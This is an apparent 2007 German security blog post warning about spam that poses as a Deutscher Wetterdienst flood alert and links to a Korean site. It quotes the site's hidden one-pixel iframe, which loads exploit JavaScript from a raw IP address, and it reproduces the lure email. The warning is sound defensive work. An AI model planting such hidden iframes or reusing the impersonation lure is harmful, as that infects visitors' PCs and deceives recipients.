Offizielle Benachrichtigung des Deutschen Wetterdienstes

Kategorie: Trojaner |

Montag 2. April 2007 von Thomas Schiller

Trojaner auf Koreanischer SeiteDeutscher SPAM wirbt für koreanische Seite. Dahinter verbirgt sich allerdings wieder der Versuch durch Aufruf der Seite schädlichen Code auf den heimischen PC einzuschleusen. Im Quelltext ist nämlich folgender Code zu finden:

< iframe style = 'visibility: hidden;' width = '1' height = '1' src = 'http://58.65.239.106/ cosmos /mrm_x/'>

Die im IFrame aufgerufene Seite beinnhaltet einen JavaScript-Code mit Exploits, wie schon in den vergangenen Mails wie z.B. von Lastminute.com oder TMS Logistik. Also auf keinen Fall den Link in der eMail anklicken. Auch ein bei Firefox funktionierender Exploit könnte darin enthalten sein. Der Internet Explorer ist aber auf alle Fälle anfällig.

Sehr geehrte Damen und Herren,
wie der Wetterdienst zum 7.04.2007 berichtet, werden in Deutschland in der naechsten Zeit Ueberschwemmungen erwartet. Besonders gefaehrliche Situation bildet sich fuer die am Ufer der Elbe gelegenen Orten.
Der westliche Teil Deutschland sollte aber auch auf der Hut sein, denn eventuelle Hochwasser-Situationen koennen auch dort entstehen. Infolge all dessen bitten wir Sie entsprechende Massnahmen zu ergreifen. Naeheres dazu sowie auch notwendige Sicherheitsmassnahmen kann man hier  http:// overturekorea .biz/ abrufen

Vielen Dank fuer Ihre Aufmerksamkeit

Tags: , , , ,

4 Kommentare über “Offizielle Benachrichtigung des Deutschen Wetterdienstes”

  1. Christoph schrieb:

    Danke für die Warnung in meinem BLog, aber ich hab nen Mac. Daher les ich immer sehr gerne diese Art von Mails…

  2. Nasendackel.de - breit kann jeder : Dreiste, dumme Spammer schrieb:

    [...] Update: Scheinbar ist das ein Trojaner. Danke an Thomas. Also Vorsicht, ihr Windows-Minderheit da draussen [...]

  3. » Anmeldung/Auftrag DP[9989] - Kunde: June - Virenguard - Weblog schrieb:

    [...] Die angeblichen Reisebuchungsbestätigungen von last-minute.com kommen nun in etwas abgewandelter Form. In der Mail ist nun auch die URL aus den in den letzten Tagen versandten Wetterdienst-Mails enthalten. [...]

  4. Offizielle Benachrichtigung des Deutschen Wetterdienstes, WTF? at + mzungu’s weblog + schrieb:

    [...] Das Virenguard Weblog hat entdeckt das die koreanische Seite schädlichen Code – ein Java Script Exploit – enthält. An diese Möglichkeit hatte ich bisher nicht gedacht. Vielen Dank für den Hinweis. [...]